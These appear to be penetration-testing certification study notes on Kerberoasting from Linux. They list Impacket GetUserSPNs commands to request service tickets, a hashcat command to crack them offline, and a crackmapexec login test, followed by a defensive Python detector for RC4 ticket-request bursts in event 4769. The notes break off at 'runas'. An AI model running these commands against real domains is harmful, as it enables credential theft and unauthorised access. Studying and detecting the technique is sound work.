OSCP-CPTS NOTES
Kerberoasting - From Linux

Last updated 1 month ago

Kerberoasting Attack Process

Step 1: Fix Clock Skew Error

Kerberos rejects requests when the client clock differs from the KDC by more than the permitted skew (5 minutes by default), so synchronise the attacking host with the Domain Controller (192.168.10.20 here) before requesting any tickets:

timedatectl set-ntp off
sudo ntpdate 192.168.10.20

Prerequisites

A prerequisite for Kerberoasting is some form of domain user access: domain user credentials (cleartext, or an NTLM hash if using Impacket), a shell in the context of a domain user account, or a high-privileged account such as SYSTEM. Once you have that level of access you can begin. You also need to identify a Domain Controller in the domain to query.

Target of the Attack

This attack targets domain accounts that have a Service Principal Name (SPN) set.

SPNs are unique identifiers that Kerberos uses to map a service instance to the service account in whose context the service runs.

Any authenticated domain user can request a service ticket (TGS) for any SPN in the domain. The ticket is encrypted with the service account's password hash, which is why it can be cracked offline once obtained.

Depending on your position in a network, this attack can be performed in multiple ways:

  • From a non-domain joined Linux host using valid domain user credentials.

  • From a domain-joined Linux host as root after retrieving the keytab file.

  • From a domain-joined Windows host authenticated as a domain user.

  • From a domain-joined Windows host with a shell in the context of a domain account.

  • As SYSTEM on a domain-joined Windows host.

Commands

  • impacket-GetUserSPNs -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil → list SPN accounts (the script is named GetUserSPNs.py when Impacket is installed from pip rather than the Kali package)

  • impacket-GetUserSPNs -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil -request → request TGS tickets for all SPN accounts

  • impacket-GetUserSPNs -dc-ip 192.168.10.20 DOMAIN.LOCAL/dollarboysushil -request-user sqldev → request a single TGS ticket

Use the -outputfile filename flag to save the TGS tickets to a file in a format hashcat accepts.

  • hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt → crack the ticket offline with hashcat (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4)

  • sudo crackmapexec smb 192.168.10.20 -u sqldev -p 'database!' → test the cracked credentials against the domain controller (single-quote the password, otherwise bash treats the ! as history expansion)
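The same ticket-request pattern is what a defender looks for in Windows Security event 4769 on the domain controller. As an added example (not from these notes; the 4769 records are constructed inline), the following Python flags any requester that pulls RC4 service tickets for several distinct SPN accounts within a short window:

```python
"""Flag a Kerberoasting pattern in Windows Security event 4769 records.
Added example, not from the original notes: one requester pulling RC4 (etype
0x17, what hashcat -m 13100 cracks) service tickets for many SPNs at once."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"  # 4769 TicketEncryptionType for RC4-HMAC

# Constructed sample records modelled on 4769 fields (not real log data).
EVENTS = [
    {"time": "2024-05-01T10:00:01", "account": "alice@DOMAIN.LOCAL",
     "service": "sqldev", "etype": "0x12", "client_ip": "192.168.10.51"},
    {"time": "2024-05-01T10:00:05", "account": "WS01$@DOMAIN.LOCAL",
     "service": "DC01$", "etype": "0x12", "client_ip": "192.168.10.52"},
    {"time": "2024-05-01T10:01:00", "account": "jdoe@DOMAIN.LOCAL",
     "service": "sqldev", "etype": "0x17", "client_ip": "192.168.10.50"},
    {"time": "2024-05-01T10:01:01", "account": "jdoe@DOMAIN.LOCAL",
     "service": "svc_backup", "etype": "0x17", "client_ip": "192.168.10.50"},
    {"time": "2024-05-01T10:01:02", "account": "jdoe@DOMAIN.LOCAL",
     "service": "svc_web", "etype": "0x17", "client_ip": "192.168.10.50"},
    {"time": "2024-05-01T10:01:03", "account": "jdoe@DOMAIN.LOCAL",
     "service": "krbtgt", "etype": "0x17", "client_ip": "192.168.10.50"},
    {"time": "2024-05-01T11:30:00", "account": "bob@DOMAIN.LOCAL",
     "service": "svc_web", "etype": "0x17", "client_ip": "192.168.10.53"},
]

def is_roastable_service(name):
    """Machine accounts ($) and krbtgt are requested constantly and are not
    Kerberoast targets, so they are excluded from the count."""
    return not name.endswith("$") and name.lower() != "krbtgt"

def kerberoast_suspects(events, window=timedelta(minutes=5), min_spns=3):
    """Return {(account, client_ip): set_of_spn_accounts} for requesters that
    asked for RC4 tickets to >= min_spns distinct accounts within `window`."""
    per_requester = defaultdict(list)
    for ev in events:
        if ev["etype"] != RC4_ETYPE or not is_roastable_service(ev["service"]):
            continue
        per_requester[(ev["account"], ev["client_ip"])].append(
            (datetime.fromisoformat(ev["time"]), ev["service"]))
    suspects = {}
    for requester, reqs in per_requester.items():
        reqs.sort()  # chronological, so each slice reqs[i:] starts at t0
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_spns:
                suspects[requester] = in_window
                break
    return suspects
```

Tune `window` and `min_spns` to the environment; a single RC4 request (bob above) is normal for legacy services, it is the burst across many SPNs that stands out.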

From a non-domain joined Windows host using /netonly.

runas